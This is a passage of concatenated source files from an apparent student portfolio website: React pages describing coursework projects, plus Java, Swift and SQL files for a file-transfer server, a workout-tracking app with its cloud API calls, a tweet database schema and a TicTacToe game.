<div className="logo-collapsed">
BA
</div>
:
<div className="logo-expanded">
<NAME>
</div>
}
<Menu theme="dark" defaultSelectKeys={['1']} mode="inline">
<Menu.Item key="7" icon={<HomeOutlined/>} onClick={this.handleHomeClick}>
Home
</Menu.Item>
<Menu.Divider/>
<Menu.Item key="1" icon={<MenuOutlined/>} onClick={this.handleProjectAClick}>
Single-Cycle MIPS Processor - Project A
</Menu.Item>
<Menu.Item key="2" icon={<MenuOutlined/>} onClick={this.handleProjectBClick}>
32-bit MIPS Pipeline Processor - Project B
</Menu.Item>
</Menu>
</Sider>
<Layout className="site-layout" style={{marginLeft:width}}>
<Header className="site-layout-background" style={{ padding: 0 }}/>
<Content style={{ margin: '0 16px' }}>
{this.state.currentPage === "ProjectA" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Computer Architecture - CPRE 381</Breadcrumb.Item>
<Breadcrumb.Item>Single-Cycle MIPS Processor - Project A</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "ProjectB" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Computer Architecture - CPRE 381</Breadcrumb.Item>
<Breadcrumb.Item>32-bit MIPS Pipeline Processor - Project B</Breadcrumb.Item>
</Breadcrumb>
}
<div className="site-layout-background" style={{ padding: 24, minHeight: 360 }}>
{page}
</div>
</Content>
</Layout>
</Layout>
);
}
}<file_sep>/src/Components/CPRE186/TCPServer.java
import java.io.BufferedInputStream;
import java.io.BufferedReader;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.Scanner;
import java.awt.Desktop;
public class TCPServer {
public static void main(String[] args) throws Exception {
String fileName = "";
String fileLength = "";
ServerSocket welcomeSocket = new ServerSocket(15001);
while (true) {
Socket connectionSocket = welcomeSocket.accept();
BufferedReader inFromClient = new BufferedReader(new InputStreamReader(connectionSocket.getInputStream()));
DataInputStream binaryInFromClient = new DataInputStream(new BufferedInputStream(connectionSocket.getInputStream()));
DataOutputStream outToClient = new DataOutputStream(connectionSocket.getOutputStream());
try {
fileName = inFromClient.readLine();
System.out.println("Recieved: " + fileName);
outToClient.writeBytes(fileName+"\n");
fileLength = inFromClient.readLine();
System.out.println("Length: " + fileLength);
outToClient.writeBytes(fileLength+"\n");
Scanner lengthInput = new Scanner(fileLength);
int length = lengthInput.nextInt();
lengthInput.close();
File file = new File("/Users/benalexander/School/ComS227/cpre186"+fileName);
DataOutputStream fileOutput = new DataOutputStream(new FileOutputStream(file));
byte[] cbuf = new byte[length];
int bytesRead = 0;
long percent = 0;
while (bytesRead < length) {
int bytesReceived = binaryInFromClient.read(cbuf, bytesRead, length-bytesRead);
if (bytesReceived > 0) {
bytesRead += bytesReceived;
percent = 100L*bytesRead/length;
System.out.print("\r Percent Received: " + percent + "%");
} else
throw new java.lang.NullPointerException();
}
System.out.println("");
fileOutput.write(cbuf, 0, length);
fileOutput.close();
} catch (java.lang.NullPointerException e) {
System.out.println("Client intitiated disconnect.");
fileName = "";
}
try {
connectionSocket.close();
} finally {
System.out.println("Connection socket closed");
}
/**
try{
//Process process = new ProcessBuilder("C:/Program Files (x86)/Windows Media Player/T-shirt.mp3").start();
//Desktop.getDesktop().open(new File("C:/users/jkc11/onedrive/documents/cpre186/server/"+fileName));
Thread t = new Thread(new Playmusic(fileName));
t.start();
} catch(Exception e){
e.printStackTrace();
}*/
}
}
}
<file_sep>/src/Components/WorkoutTracker/ExerciseViewController.swift
//
// ExerciseViewController.swift
// WorkoutTracker
//
// Created by <NAME> on 1/11/20.
// Copyright © 2020 <NAME>. All rights reserved.
//
import UIKit
class ExerciseViewController: UIViewController {
@IBOutlet weak var exerciseName: UITextField!
@IBOutlet weak var workoutName: UITextField!
@IBOutlet weak var reps: UITextField!
@IBOutlet weak var weight: UITextField!
var setOrderNum: Int = 0
var exerciseNum: Int = 0
var wID: String = ""
var sets: [ExerciseSet] = []
var exercises: [Exercise] = []
override func viewDidLoad() {
super.viewDidLoad()
}
@IBAction func enterSet(_ sender: Any) {
setOrderNum += 1
let set = ExerciseSet(reps: reps.text!, weight: weight.text!, orderNum: setOrderNum, exerciseID: -1, exerciseOrder: exerciseNum)
sets.append(set)
reps.text = ""
weight.text = ""
}
@IBAction func nextExercise(_ sender: Any) {
exerciseNum += 1
setOrderNum = 0
let exercise = Exercise(name: exerciseName.text!, eID: -1)
exercises.append(exercise)
exerciseName.text = ""
}
@IBAction func endWorkout(_ sender: Any) {
let formatter : DateFormatter = DateFormatter()
formatter.dateFormat = "yyyy/M/d"
let date : String = formatter.string(from: NSDate.init(timeIntervalSinceNow: 0) as Date)
let calDate = Date()
let calendar = Calendar.current
let hour = calendar.component(.hour, from: calDate)
let minute = calendar.component(.minute, from: calDate)
let second = calendar.component(.second, from: calDate)
let time = "\(hour):\(minute):\(second)"
let url = URL(string: "https://workoutapp-262402.appspot.com/addWorkout?user_id=" + String(Variables.userID)
+ "&date=" + date + "&time=" + time + "&name=" + workoutName.text!)!
var request = URLRequest(url: url)
request.httpMethod = "POST"
let task = URLSession.shared.dataTask(with: request) {(data, response, error) in
guard let data = data else {return}
let result = String(data: data, encoding: .utf8)
let items = result?.components(separatedBy: ", ")
let wIDstr = String(items?[4] ?? "")
self.wID = wIDstr[5..<(wIDstr.count - 1)]
self.postExercises()
}
task.resume()
}
func postExercises() -> Void {
var count: Int = 0
for exercise in exercises{
let url = URL(string: "https://workoutapp-262402.appspot.com/addExercise?name=" + exercise.showName()
+ "&w_id=" + self.wID)!
var request = URLRequest(url: url)
request.httpMethod = "POST"
let task = URLSession.shared.dataTask(with: request) {(data, response, error) in
guard let data = data else {return}
print(String(data: data, encoding: .utf8) ?? "")
let result = String(data: data, encoding: .utf8)
let items = result?.components(separatedBy: ", ")
let eIDstr = String(items?[0] ?? "")
let eIDint = Int(eIDstr[28..<(eIDstr.count)])
exercise.setEID(eID: eIDint ?? -1)
self.postSets(currentEnum: count, currentExercise: exercise) // Only the sets associated with the exercise just posted
count += 1
}
task.resume()
}
}
func postSets(currentEnum: Int, currentExercise: Exercise) -> Void {
//For loop sets the eID in the sets based off the exerciseOrder when entered then posts the set
for s in sets{
if currentEnum == s.showExerciseOrder() {
s.setExerciseID(exerciseID: currentExercise.showEID())
//Posts the set
var urlString = "https://workoutapp-262402.appspot.com/addSet?reps="
urlString += s.showReps()
urlString += "&weight=" + s.showWeight()
urlString += "&orderNum=" + String(s.showOrderNum())
urlString += "&e_id=" + String(s.showExerciseID())
urlString += "&w_id=" + self.wID
let url = URL(string: urlString)!
var request = URLRequest(url: url)
request.httpMethod = "POST"
let task = URLSession.shared.dataTask(with: request) {(data, response, error) in
print(String(data: data!, encoding: .utf8) ?? "")
}
task.resume()
}
}
}
}
//For substring ability
extension String {
subscript(_ range: CountableRange<Int>) -> String {
let start = index(startIndex, offsetBy: max(0, range.lowerBound))
let end = index(startIndex, offsetBy: min(self.count, range.upperBound))
return String(self[start..<end])
}
subscript(_ range: CountablePartialRangeFrom<Int>) -> String {
let start = index(startIndex, offsetBy: max(0, range.lowerBound))
return String(self[start...])
}
}
<file_sep>/src/Components/ComS363/projectDDL.sql
drop database if exists `project`;
create database `project`;
use project;
drop table if exists userAccount;
create table userAccount(
screen_name varchar(40),
uname varchar(40),
sub_category char(40),
category char(40),
state char(15),
numFollowing int,
numFollowers int,
primary key(screen_name));
drop table if exists tweet;
create table tweet(
tid varchar(20),
textbody varchar(200),
retweet_count int,
posted varchar(20),
screen_name varchar(40) not null,
primary key(tid),
foreign key(screen_name) references userAccount(screen_name) on delete cascade);
drop table if exists hashtag;
create table hashtag(
h_tid varchar(20) not null,
hname varchar(100),
primary key(hname, h_tid),
foreign key(h_tid) references tweet(tid));
drop table if exists url;
create table url(
url_tid varchar(20) not null,
url_name varchar(500),
primary key(url_name, url_tid),
foreign key(url_tid) references tweet(tid));
drop table if exists mentioned;
create table mentioned(
tid varchar(20),
screen_name varchar(40),
primary key(tid, screen_name),
foreign key(tid) references tweet(tid));
-- foreign key(screen_name) references userAccount(screen_name));
set @enable_dth = 1;
set @enable_dtu = 1;
set @enable_dt = 1;
drop trigger if exists delete_tweet_hashtag;
delimiter $$
create trigger `delete_tweet_hashtag` after delete on `hashtag` for each row begin
if @enable_dth = 1 then
set @enable_dtu = 0;
set @enable_dt = 0;
delete from mentioned where old.h_tid = tid;
delete from url where old.h_tid = url_tid;
delete from tweet where old.h_tid = tid;
set @enable_dtu = 1;
set @enable_dt = 1;
end if;
end $$
delimiter ;
drop trigger if exists delete_tweet_url;
delimiter $$
create trigger `delete_tweet_url` after delete on `url` for each row begin
if @enable_dtu = 1 then
set @enable_dth = 0;
set @enable_dt = 0;
delete from mentioned where old.url_tid = tid;
delete from hashtag where old.url_tid = h_tid;
delete from tweet where old.url_tid = tid;
set @enable_dt = 1;
set @enable_dth = 1;
end if;
end $$
delimiter ;
drop trigger if exists delete_tweet;
delimiter $$
create trigger `delete_tweet` before delete on `tweet` for each row begin
if @enable_dt = 1 then
set @enable_dtu = 0;
set @enable_dth = 0;
delete from mentioned where old.tid = tid;
delete from hashtag where old.tid = h_tid;
delete from url where old.tid = url_tid;
set @enable_dth = 1;
set @enable_dtu = 1;
end if;
end $$
delimiter ;
drop trigger if exists delete_user;
delimiter $$
create trigger `delete_user` before delete on `userAccount` for each row begin
delete from tweet where old.screen_name = screen_name;
end $$
delimiter ;
<file_sep>/src/Components/WorkoutTracker/WorkoutTracker.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import './WorkoutTracker.css';
import Demo from './demo.mov';
import ProjectFiles from './workoutTrackerFiles.zip';
import ERDiagram from './ERdiagram.png';
import WorkoutControllerImage from './workoutController.png';
import WorkoutControllerFile from './WorkoutController.java';
import WorkoutImage from './workoutModel.png';
import WorkoutFile from './workout.java';
import ExerciseControllerImage from './exerciseController.png';
import ExerciseControllerFile from './ExerciseController.java';
import ExerciseImage from './exerciseModel.png';
import ExerciseFile from './exercise.java';
import DDLImage from './DDL.png';
import Storyboard from './navigation.png';
import ExerciseVCImage1 from './ExerciseViewControllerSS1.png';
import ExerciseVCImage2 from './ExerciseViewControllerSS2.png';
import ExerciseVCFile from './ExerciseViewController.swift';
import HistoryVCImage from './HistoryViewController.png';
import HistoryVCFile from './HistoryViewController.swift';
import DetailsVCImage from './DetailsViewController.png';
import DetailsVCFile from './DetailsViewController.swift';
const Title = Typography.Title;
export default class WorkoutTracker extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Mobile App to Web API - Workout Tracker</Title>
<Title level={4}>Technologies: Swift, Xcode, Java Springboot, MySQL, Google Cloud Platform</Title>
This app allows someone to track their weight lifting statistics during a workout and
then saves them to the cloud. The user can then look at a history of their workouts
and view the details of each one.
<br></br><br></br>
My previous work with iOS and the Google Cloud Platform (GCP) made me take an interest in
connecting a mobile app to a GCP API. I first started the server instance on GCP's App Engine,
then deployed software to it with Java Springboot. I then connected the App Engine to
a GCP SQL instance to store user data. Next, I made an entity relation diagram and configured
the SQL instance with the SQL file I made from the diagram using MySQL. Lastly, I made
all the frontend components in Xcode that communicated with the server using HTTP requests.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
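{/*
  The app itself issues these requests from Swift with URLSession (see
  ExerciseViewController.swift further down this page). For illustration only, here is the
  same addWorkout call expressed as a JavaScript fetch; the endpoint and query parameters
  come from that Swift file, while everything else is a sketch.

  async function addWorkout(userId, name) {
    const now = new Date();
    const date = `${now.getFullYear()}/${now.getMonth() + 1}/${now.getDate()}`;
    const time = `${now.getHours()}:${now.getMinutes()}:${now.getSeconds()}`;
    const url = "https://workoutapp-262402.appspot.com/addWorkout"
      + "?user_id=" + encodeURIComponent(userId)
      + "&date=" + encodeURIComponent(date)
      + "&time=" + encodeURIComponent(time)
      + "&name=" + encodeURIComponent(name);
    const response = await fetch(url, { method: "POST" });
    // In the app, the response text is parsed to recover the id of the new workout.
    return response.text();
  }
*/}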
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={2}>Demo</Title>
<video controls width='50%'>
<source src={Demo}></source>
</video>
<Title level={4}>Entity relation diagram showing database design</Title>
<img width='100%' src={ERDiagram} alt=''/>
<Title level={4}>WorkoutController.java</Title>
<a href={WorkoutControllerFile} download="WorkoutController.java">
<img width='100%' src={WorkoutControllerImage} alt=''/>
</a>
<Title level={4}>Workout.java (the entity model of a workout)</Title>
<a href={WorkoutFile} download="Workout.java">
<img width='100%' src={WorkoutImage} alt=''/>
</a>
<Title level={4}>ExerciseController.java</Title>
<a href={ExerciseControllerFile} download="ExerciseController.java">
<img width='100%' src={ExerciseControllerImage} alt=''/>
</a>
<Title level={4}>exercise.java</Title>
<a href={ExerciseFile} download="exercise.java">
<img width='100%' src={ExerciseImage} alt=''/>
</a>
<Title level={4}>WorkoutTracker.sql</Title>
<img width='100%' src={DDLImage} alt=''/>
<Title level={4}>Main.storyboard (manages navigation and UI components)</Title>
</Col>
<Col span={24}>
<img width='100%' src={Storyboard} alt=''/>
</Col>
<Col span={18}>
<Title level={4}>ExerciseViewController.swift</Title>
<a href={ExerciseVCFile} download="ExerciseViewController.swift">
<img width='100%' src={ExerciseVCImage1} alt=''/>
<img width='100%' src={ExerciseVCImage2} alt=''/>
</a>
<Title level={4}>HistoryViewController.swift</Title>
<a href={HistoryVCFile} download="HistoryViewController.swift">
<img width='100%' src={HistoryVCImage} alt=''/>
</a>
<Title level={4}>DetailsViewController.swift</Title>
<a href={DetailsVCFile} download="DetailsViewController.swift">
<img width='100%' src={DetailsVCImage} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS227/A3/A3.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import ProjectFiles from './assignment3.zip';
import FlowGame from './FlowGame.java';
import FlowGameSS1 from './FlowGameSS1.png';
import FlowGameSS2 from './FlowGameSS2.png';
import FlowGameSS3 from './FlowGameSS3.png';
import guiSS1 from './guiSS1.png';
import guiSS2 from './guiSS2.png';
import guiSS3 from './guiSS3.png';
import Util from './Util.java';
import UtilSS1 from './UtilSS1.png';
import UtilSS2 from './UtilSS2.png';
const Title = Typography.Title;
export default class ComS227A3 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Color Flow Game - Assignment 3</Title>
<Title level={4}>Technology: Java, Eclipse</Title>
<li>Implemented the logic of a color flow game</li>
<li>Has ability to create a game from an input string or file</li>
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<img width='33%' src={guiSS1} alt=''/>
<img width='33%' src={guiSS2} alt=''/>
<img width='33%' src={guiSS3} alt=''/>
<Title level={4}>FlowGame.java (click on image to download file)</Title>
<a href={FlowGame} download="FlowGame.java">
<img width='100%' src={FlowGameSS1} alt=''/>
<img width='100%' src={FlowGameSS2} alt=''/>
<img width='100%' src={FlowGameSS3} alt=''/>
</a>
<Title level={4}>Util.java (click on image to download file)</Title>
<a href={Util} download="Util.java">
<img width='100%' src={UtilSS1} alt=''/>
<img width='100%' src={UtilSS2} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/WorkoutApp/HistoryViewController.swift
//
// HistoryViewController.swift
// workoutApp
//
// Created by <NAME> on 1/20/19.
// Copyright © 2019 <NAME>. All rights reserved.
//
import UIKit
class HistoryViewController: UIViewController, UITableViewDelegate, UITableViewDataSource {
@IBOutlet weak var HistoryTableView: UITableView!
override func viewDidLoad() {
super.viewDidLoad()
//Sample Data
/*
let exercise1 = Exercise(name: "bench", reps: [10,10,9,9], weight: [165,165,165,165])
let exercise2 = Exercise(name: "rows", reps: [9,9,9,9], weight: [120,120,120,120])
let exercise3 = Exercise(name: "deadlift", reps: [8,8,7,6], weight: [225,225,225,225])
let exercise4 = Exercise(name: "incline", reps: [10,10,10,10], weight: [80,80,80,80])
let workout1 = Workout(exercises: [exercise1!], date: "1/19/2019")
let workout2 = Workout(exercises: [exercise1!], date: "1/20/2019")
let workout3 = Workout(exercises: [exercise1!, exercise2!, exercise3!, exercise4!], date: "1/21/2019")
Variables.workouts.append(workout1!)
Variables.workouts.append(workout2!)
Variables.workouts.append(workout3!)
*/
}
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return Variables.workouts.count
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
//let cell = UITableViewCell(style: UITableViewCell.CellStyle.default, reuseIdentifier: "cell")
let cell = tableView.dequeueReusableCell(withIdentifier: "cell", for: indexPath) as? HistoryTableViewCell
cell!.label.text = Variables.workouts[Variables.workouts.count - indexPath.row - 1].showDate()
return cell!
}
func tableView(_ tableView: UITableView, didSelectRowAt indexPath: IndexPath) {
Variables.clickedOn = Variables.workouts.count - indexPath.row - 1
}
/*
// MARK: - Navigation
// In a storyboard-based application, you will often want to do a little preparation before navigation
override func prepare(for segue: UIStoryboardSegue, sender: Any?) {
// Get the new view controller using segue.destination.
// Pass the selected object to the new view controller.
}
*/
}
<file_sep>/src/ClassComponents/ComS227/TallyClass/TallyClass.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import ProjectFiles from './miniAssignment1.zip';
import output from './output.png';
import TallyNumberJava from './TallyNumber.java';
import TallyNumberSS1 from './TallyNumberSS1.png';
import TallyNumberSS2 from './TallyNumberSS2.png';
import TallyNumberTestJava from './TallyNumberTest.java';
import TallyNumberTestPNG from './TallyNumberTest.png';
const Title = Typography.Title;
export default class TallyClass extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Tally Class - Assignment 1</Title>
<Title level={4}>Technology: Java, Eclipse</Title>
Here, I made a class that performs different actions on a tally numbering system,
such as 1 = |, 2 = ||, 3 = |||, 5 = *, and so on. Some of the program's methods include combining
two tally sets, converting a set to a number, and converting a number to a tally.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
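{/*
  The assignment itself is the Java file TallyNumber.java linked below; this JavaScript
  sketch only illustrates the tally notation described above, where '*' stands for a group
  of five and '|' for a single unit. The function names are illustrative, not taken from
  the Java file.

  function numberToTally(n) {
    // e.g. 7 -> "*||"
    return "*".repeat(Math.floor(n / 5)) + "|".repeat(n % 5);
  }

  function tallyToNumber(tally) {
    // e.g. "*||" -> 7
    let total = 0;
    for (const c of tally) total += (c === "*") ? 5 : 1;
    return total;
  }

  // Combining two tally sets then amounts to adding their values and re-encoding:
  // numberToTally(tallyToNumber("*||") + tallyToNumber("|||")) === "**"
*/}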
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>TallyNumber.java (click on image to download file)</Title>
<a href={TallyNumberJava} download="TallyNumber.java">
<img width='100%' src={TallyNumberSS1} alt=''/>
<img width='100%' src={TallyNumberSS2} alt=''/>
</a>
<Title level={4}>TallyNumberTest.java (click on image to download file)</Title>
<a href={TallyNumberTestJava} download="TallyNumberTest.java">
<img width='50%' src={TallyNumberTestPNG} alt=''/>
</a>
<Title level={4}>Output of TallyNumberTest.java</Title>
<img width='50%' src={output} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/ComS319/TicTacToe.java
package assignment1;
public class TicTacToe {
/**
* holds ' ' if empty, or 'X' or 'O' if not empty
*/
public char topLeft;
public char topMiddle;
public char topRight;
public char middleLeft;
public char middle;
public char middleRight;
public char bottomLeft;
public char bottomMiddle;
public char bottomRight;
/**
* starts the game off with spaces in each cell which signify empty
*/
public TicTacToe(){
topLeft = ' ';
topMiddle = ' ';
topRight = ' ';
middleLeft = ' ';
middle = ' ';
middleRight = ' ';
bottomLeft = ' ';
bottomMiddle = ' ';
bottomRight = ' ';
}
/**
* Makes a move in the cell corresponding to the location description. If the spot is taken, the method returns false.
* If the spot is not taken, the move will be made and the method will return true.
* @param s
* @param player
* @return true if the spot was vacant and the move was made, false if it was taken
*/
public boolean makeMove(String s, char player){
if(s.equals("top left") && isTaken(topLeft) == false){
topLeft = player;
return true;
}
if(s.equals("top middle") && isTaken(topMiddle) == false){
topMiddle = player;
return true;
}
if(s.equals("top right") && isTaken(topRight) == false){
topRight = player;
return true;
}
if(s.equals("middle left") && isTaken(middleLeft) == false){
middleLeft = player;
return true;
}
if(s.equals("middle") && isTaken(middle) == false){
middle = player;
return true;
}
if(s.equals("middle right") && isTaken(middleRight) == false){
middleRight = player;
return true;
}
if(s.equals("bottom left") && isTaken(bottomLeft) == false){
bottomLeft = player;
return true;
}
if(s.equals("bottom middle") && isTaken(bottomMiddle) == false){
bottomMiddle = player;
return true;
}
if(s.equals("bottom right") && isTaken(bottomRight) == false){
bottomRight = player;
return true;
}
return false;
}
/**
* Helper method that checks if the spot is taken
* @param c
* @return false if not taken, true if taken
*/
private boolean isTaken(char c){
if(c == ' '){
return false;
}
else{
return true;
}
}
/**
* If there is a winner, the method will return 'O' or 'X'. If the game is a tie it will return 'T'.
* If the game isn't a tie and nobody has won, the method returns 'C'.
* @return C, O, X, or T
*/
public char checkGame(){
if(topLeft == 'O' && topMiddle == 'O' && topRight == 'O'){
return 'O';
}
if(topLeft == 'X' && topMiddle == 'X' && topRight == 'X'){
return 'X';
}
if(middleLeft == 'O' && middle == 'O' && middleRight == 'O'){
return 'O';
}
if(middleLeft == 'X' && middle == 'X' && middleRight == 'X'){
return 'X';
}
if(bottomLeft == 'O' && bottomMiddle == 'O' && bottomRight == 'O'){
return 'O';
}
if(bottomLeft == 'X' && bottomMiddle == 'X' && bottomRight == 'X'){
return 'X';
}
if(topLeft == 'O' && middleLeft == 'O' && bottomLeft == 'O'){
return 'O';
}
if(topLeft == 'X' && middleLeft == 'X' && bottomLeft == 'X'){
return 'X';
}
if(topMiddle == 'O' && middle == 'O' && bottomMiddle == 'O'){
return 'O';
}
if(topMiddle == 'X' && middle == 'X' && bottomMiddle == 'X'){
return 'X';
}
if(topRight == 'O' && middleRight == 'O' && bottomRight == 'O'){
return 'O';
}
if(topRight == 'X' && middleRight == 'X' && bottomRight == 'X'){
return 'X';
}
if(topLeft == 'O' && middle == 'O' && bottomRight == 'O'){
return 'O';
}
if(topLeft == 'X' && middle == 'X' && bottomRight == 'X'){
return 'X';
}
if(topRight == 'O' && middle == 'O' && bottomLeft == 'O'){
return 'O';
}
if(topRight == 'X' && middle == 'X' && bottomLeft == 'X'){
return 'X';
}
if(isTaken(topLeft) && isTaken(topMiddle) && isTaken(topRight) && isTaken(middleLeft) && isTaken(middle)
&& isTaken(middleRight) && isTaken(bottomLeft) && isTaken(bottomMiddle) && isTaken(bottomRight)){
return 'T';
}
return 'C';
}
/**
* resets the game with empty cells
*/
public void reset(){
topLeft = ' ';
topMiddle = ' ';
topRight = ' ';
middleLeft = ' ';
middle = ' ';
middleRight = ' ';
bottomLeft = ' ';
bottomMiddle = ' ';
bottomRight = ' ';
}
/**
* shows game on the console
*/
public void showGame(){
System.out.println(topLeft + " | " + topMiddle + " | " + topRight);
System.out.println("---------");
System.out.println(middleLeft + " | " + middle + " | " + middleRight);
System.out.println("---------");
System.out.println(bottomLeft + " | " + bottomMiddle + " | " + bottomRight);
}
}<file_sep>/src/ClassComponents/ComS228/Project1/Project1.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import BioSeqDataJava from './BioSeqData.java';
import BioSeqDataPNG from './BioSeqData.png';
import BSDoutput from './BSDoutput.png';
import DNASequenceJava from './DNASequence.java';
import DNASequencePNG from './DNASequence.png';
import GenDNASequencePNG from './GenDNAsequence.png';
import GenDNASequenceJava from './GenomicDNASequence.java';
import ProjectFiles from './hw1.zip';
import ProteinSequenceJava from './ProteinSequence.java';
import ProteinSequencePNG from './ProteinSequence.png';
import Sequence from './Sequence.java';
import SequenceSS1 from './SequenceSS1.png';
import SequenceSS2 from './SequenceSS2.png';
const Title = Typography.Title;
export default class Project1 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>DNA Example of Polymorphism - Project 1</Title>
<Title level={4}>Technology: Java, Eclipse</Title>
This project involved displaying data about example biological sequences. This kind of data is
good for experimenting with polymorphism because there are subtypes of biological sequences, such as
genomic DNA sequences and protein sequences.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
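{/*
  The project classes (Sequence, DNASequence, GenomicDNASequence, ProteinSequence) are the
  Java files linked below; this JavaScript sketch only illustrates the polymorphism idea:
  a base sequence class whose subclasses override which letters count as valid. The letter
  sets here are simplified assumptions, not the project's exact rules.

  class Sequence {
    constructor(letters) {
      this.letters = letters;
    }
    // Base class: any alphabetic character is accepted.
    isValidLetter(c) {
      return /[a-z]/i.test(c);
    }
    describe() {
      return this.constructor.name + ": " + this.letters;
    }
  }

  class DNASequence extends Sequence {
    // Subclass narrows the rule to the four DNA bases.
    isValidLetter(c) {
      return "ACGTacgt".includes(c);
    }
  }

  // One loop handles every subtype through the shared interface:
  // for (const s of [new Sequence("MKV"), new DNASequence("ACGT")]) console.log(s.describe());
*/}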
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>Sequence.java (click on image to download file)</Title>
<a href={Sequence} download="Sequence.java">
<img width='100%' src={SequenceSS1} alt=''/>
<img width='100%' src={SequenceSS2} alt=''/>
</a>
<Title level={4}>DNASequence.java (click on image to download file)</Title>
<a href={DNASequenceJava} download="DNASequence.java">
<img width='100%' src={DNASequencePNG} alt=''/>
</a>
<Title level={4}>GenomicDNASequence.java (click on image to download file)</Title>
<a href={GenDNASequenceJava} download="GenomicDNASequence.java">
<img width='100%' src={GenDNASequencePNG} alt=''/>
</a>
<Title level={4}>ProteinSequence.java (click on image to download file)</Title>
<a href={ProteinSequenceJava} download="ProteinSequence.java">
<img width='100%' src={ProteinSequencePNG} alt=''/>
</a>
<Title level={4}>BioSeqData.java (click on image to download file)</Title>
<a href={BioSeqDataJava} download="BioSeqData.java">
<img width='100%' src={BioSeqDataPNG} alt=''/>
</a>
<Title level={4}>Example output of BioSeqData.java</Title>
<img width='100%' src={BSDoutput} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/WorkoutTracker/exercise.java
package com.example.demo.model;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.Table;
@Entity
@Table(name="exercise")
public class exercise {
@Id
@Column(name="e_id")
@GeneratedValue(strategy = GenerationType.SEQUENCE)
private int e_id;
@Column(name="name")
private String name;
@Column(name="w_id")
private int wID;
public int getE_id() {
return e_id;
}
public void setE_id(int e_id) {
this.e_id = e_id;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public int getW_id() {
return wID;
}
public void setW_id(int w_id) {
this.wID = w_id;
}
@Override
public String toString() {
return "exercise [e_id=" + e_id + ", name=" + name + ", w_id=" + wID + "]";
}
}
<file_sep>/src/ClassComponents/CPRE185/Lab9/Lab9.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import lab9C from './lab9.c';
import lab9SS1 from './lab9SS1.png';
import lab9SS2 from './lab9SS2.png';
const Title = Typography.Title;
export default class Lab9 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Word Builder - Lab 9</Title>
<Title level={4}>Technology: C, Arduino Esplora</Title>
For this lab, I created a sentence builder program using the Arduino Esplora. The user
could navigate a list of words on the console screen using the buttons of the Esplora.
They could then select the words and they would be added to a sentence at the top of
the console output.
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>lab9.c (click on image to download file)</Title>
<a href={lab9C} download="lab9.c">
<img width='100%' src={lab9SS1} alt=''/>
<img width='100%' src={lab9SS2} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS228/Project4/Project4.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import DictionaryJava from './Dictionary.java';
import DictionaryPNG from './Dictionary.png';
import EntryTree from './EntryTree.java';
import EntryTreeSS1 from './EntryTreeSS1.png';
import EntryTreeSS2 from './EntryTreeSS2.png';
import EntryTreeSS3 from './EntryTreeSS3.png';
import EntryTreeSS4 from './EntryTreeSS4.png';
import ProjectFiles from './hw4.zip';
import output1 from './output1.png';
import output2 from './output2.png';
import output3 from './output3.png';
const Title = Typography.Title;
export default class Project4 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Tree Data Structure - Project 4</Title>
<Title level={4}>Technology: Java, Eclipse</Title>
This project shows the implementation of a tree data structure with the parent and
child node objects being connected through the fields in the nodes. There are functions
like contains() which returns true if an input node is in the tree, and prefix() which
has a sequence of nodes as an input and returns an array of the longest occurrence of
the sequence in the tree.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
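{/*
  The actual implementation is the Java file EntryTree.java linked below; this JavaScript
  sketch only illustrates the two operations described above: contains() and a
  prefix-style lookup that returns the longest leading part of a key sequence found in the
  tree. The node shape used here is an assumption made for the example.

  class TreeNode {
    constructor(key) {
      this.key = key;
      this.children = new Map(); // key -> child TreeNode
    }
  }

  class EntryTree {
    constructor() {
      this.root = new TreeNode(null);
    }

    // Insert a sequence of keys as a root-to-node path, creating nodes as needed.
    add(keys) {
      let node = this.root;
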